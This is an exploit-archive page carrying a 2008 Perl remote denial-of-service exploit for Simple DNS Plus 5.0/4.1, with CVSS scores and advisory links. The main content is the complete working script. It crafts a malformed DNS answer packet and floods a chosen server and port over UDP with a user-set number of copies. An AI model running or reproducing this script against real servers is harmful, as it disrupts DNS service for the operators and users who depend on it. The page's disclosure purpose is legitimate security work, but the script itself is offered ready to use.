Simple DNS Plus <= 5.0/4.1 Remote Denial of Service Exploit

2008.07.20
Credit: Exodus
Risk: Medium
Local: No
Remote: Yes


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

#!/usr/bin/perl # Simple DNS Plus 5.0/4.1 < remote Denial of Service exploit # # usage: sdns-dos.pl <dns server> <dns source port> <num of packets> # Exploit written by Exodus. # http://www.blackhat.org.il use IO::Socket; if(@ARGV < 3){ print("sdns-dos.pl <dns server> <dns source port> <num of packets>"); } $sock = IO::Socket::INET->new(PeerAddr => "$ARGV[0]:$ARGV[1]", Proto => 'UDP') || die("Cant connect DNS server"); $address = $ARGV[0]; $trans = pack("H4","1337"); $flags = pack("B16","1000010110110000"); $question = pack("H4","0001"); $answerRR = pack("H4","0001"); $authorityRR = pack("H4","0000"); $additionlRR = pack("H4","0000"); $type = pack("H4","0001"); # A host name $class = pack("H4","0001"); # IN @parts = split(/\./,$address); foreach $part (@parts) { $packedlen = pack("H2",sprintf("%02x",length($part))); $address2 .= $packedlen.$part; } $query = $address2. "\000" . $type . $class; $aname = pack("H4","c00c"); $atype = pack("H4","0001"); $aclass = pack("H4","0001"); $ttl = pack("H8","0000008d"); $dlen = pack("H4","0004"); $addr = inet_aton("127.0.0.1"); $answer = $aname . $atype . $aclass . $ttl . $dlen . $addr; $payload = $trans . $flags . $question . $answerRR . $authorityRR . $additionlRR . $query . $answer; print "sending $ARGV[2] packets&#65533;&#166; "; for($i=0;$i<=$ARGV[2];$i++) { print $sock $payload; } print "Done. Good bye."; __END__

References:

http://xforce.iss.net/xforce/xfdb/43767
http://www.simpledns.com/kb.aspx?kbid=1246
http://www.securityfocus.com/bid/30207
http://www.securityfocus.com/archive/1/archive/1/494304/100/0/threaded
http://www.milw0rm.com/exploits/6059
http://www.blackhat.org.il/index.php/simple-dns-plus-5041-remote-denial-of-service-exploit/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top